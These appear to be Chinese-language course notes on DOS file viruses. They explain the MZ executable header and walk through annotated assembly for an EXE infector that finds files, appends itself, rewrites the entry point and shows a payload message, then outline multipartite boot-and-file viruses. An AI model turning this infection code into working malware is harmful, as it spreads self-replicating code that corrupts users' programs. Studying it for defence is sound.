四、DOS病毒之文件型病毒

4.4 文件型病毒

基本原理

感染MZ文件

MZ文件结构及其加载

• 文件结构

00-01  e_magic; // 文件类型标记：0x4D5A魔术数字
02-03  e_cblp; // 文件最后页的字节数
04-05  e_cp; // 文件页数
06-07  e_crlc; // 重定义项个数
08-09  e_cparhdr; // 头部尺寸，以16B的段落为单位
0a-0b  e_minalloc; // 所需的最小内存段
0c-0d  e_maxalloc; // 所需的最大内存段 
0e-0f  e_ss; // 初始的SS值（相对偏移量）
10-11 e_sp; // 初始的SP值
12-13 e_csum; // 校验和
14-15 e_ip; // 初始的IP值
16-17 e_cs; // 初始的CS值（相对偏移量）
18-19 e_lfarlc; // 重定位表偏移地址
1a-1b e_ovno; // 覆盖号

重定位表
载入模块....

• 加载

1. 申请内存后，把载入模块读入内存指定区域
2. DS、ES指向程度段前缀PSP
3. CS、IP、SS、SP由文件头的格式化区域确定并通过重定位进行调整
4. EXE文件加载之后，从CS：IP开始执行。
5. 病毒一般将自己加在文件的末端，并修改CS、IP的值指向病毒起始地址，修改文件长度和SS、SP

MZ文件病毒样例分析

设置DTA
mov  ah, 1ah
mov  dx, offset  own_dta-Virus_Start
add  dx,  si
int     21

查找EXE文件
mov  ah, 4eh
mov  dx, offset file_match-Virus_Start
add  dx,  si
int     21
jnc   count2

打开感染文件
mov  ah, 3d02h
mov   dx,   Own_dta-Virus_Start+1eh//文件名
add    dx,  si
int      21
jnc   count1

读感染文件头
mov  ah, 3fh
mov  cx, 1ch
mov   dx,   offset  Exe_Header-Virus_Start
add    dx,  si
int      21
jnc   count1

判读是否感染
   cmp  byte ptr ds:[si+Exe_Header-Virus_Start], ‘M’
	jnz    no_exe
	cmp  word ptr ds:[si+Exe_Header-Virus_Start+12], ‘FB’
    jz       infected

移动文件指针至文件尾
	mov  ax,  4202h
	xor    cx,  cx
	xor    dx,  dx
	int     21
    push  dx  //宿主程序尾，也是病毒体的开始
    push  ax  //将以此为感染后EXE文件的入口

写病毒体至文件尾
	mov  ax,  40h
	mov  cx,  Virus_Length  //病毒体长度
	mov  dx,  si  //病毒开始位置
	int     21

获取感染后新文件的长度
	mov  ax,  4202h
	xor    cx,  cx
	xor    dx,  dx
	int     21
    mov  cx,  200//512 一页
    div    cx
    inc    ax 

改写感染后文件头中文件长度信息
	mov  word ptr ds:[si+Exe_Header-Virus_Start+2], dx
    //文件最后一页的字节数
	mov  word ptr ds:[si+Exe_Header-Virus_Start+4], ax
    //文件总页数

修改感染文件入口至病毒代码处
	pop  ax
    pop  dx
	mov cx, 10
    div   cx
    sub  ax, word ptr ds:[si+Exe_Header-Virus_Start+8]
    //文件头大小 
	mov  word ptr ds:[si+Exe_Header-Virus_Start+16], ax
    //CS
	mov  word ptr ds:[si+Exe_Header-Virus_Start+14], dx
    //IP

写修改后的文件头至感染文件
	mov  ax,  4200h
	xor    cx,  cx
	xor    dx,  dx
	int     21
	mov  ah, 40
	mov  cx, 1ch
	mov  dx,  offset Exe_header-Virus_Start
    add   dx,  si
    int     21

病毒发作
	pop   dx     //指向PSP的DS
   add   dx,  offset  sz_message-Virus_Start
	mov  ah, 09h
	int     21

返回宿主程序入口
	mov  ax, es
	add   ax, 10
	add   ax, cs:[si+Exe_header-Virus_Start+16]
	push  ax  //宿主CS
	push   cs:[si+Exe_header-Virus_Start+14]//宿主IP
    push   ds
    ....	
	pop     ds
	retf

4.5 混合型病毒的基本原理

概念

• 混合型病毒也称多型病毒，是结合了引导型和文件型两种病毒而互为感染的病毒，有感染文件和引导扇区两种目标
• 混合型病毒既能感染引导区，又能感染文件，但并非将文件型病毒和引导型病毒简单地加在一起。

基本原理

1. 文件中的病毒执行时将病毒写入引导区
2. 染毒盘启动系统时，用引导型病毒的方法驻留内存，但此时DOS未加载，无法修改INT 21H，无法感染文件。
3. 通常的做法是修改INT 8H，用INT 8H服务程序监测INT 21H的地址是否修改，如果修改，说明DOS已加载，则可修改INT 21H指向病毒传染段。